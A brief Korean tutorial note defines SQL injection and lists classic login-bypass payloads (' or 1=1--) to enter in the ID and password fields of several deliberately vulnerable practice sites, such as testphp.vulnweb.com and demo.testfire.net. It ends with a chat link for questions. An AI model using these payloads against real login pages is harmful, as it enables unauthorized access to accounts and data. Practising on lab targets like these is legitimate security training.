입력 값을 변조하여 비정상적인 SQL 쿼리를 조합하거나 실행하는 공격
로그인 페이지에 SQL 쿼리문을 삽입하여 로그인이 되는지 확인
로그인 페이지에 SQL 인젝션 공격 시도(id/passwd 부분에 'or 1=1 --' 등의 구문 입력
http://testasp.vulnweb.com
ID : test
PW : 'or 1=1--
http://testphp.vulnweb.com/userinfo.php
ID : ' or 1=1--
PW : ' or 1=1--
http://testaspnet.vulnweb.com/login.aspx
ID : ' or 1=1--
PW : ' or 1=1--
https://demo.testfire.net/login.jsp
이와 관련해서 궁금한 사항은 편하게 아래 채널에 들어오셔서 문의주시면 됩니다.
https://open.kakao.com/o/gQdzVQof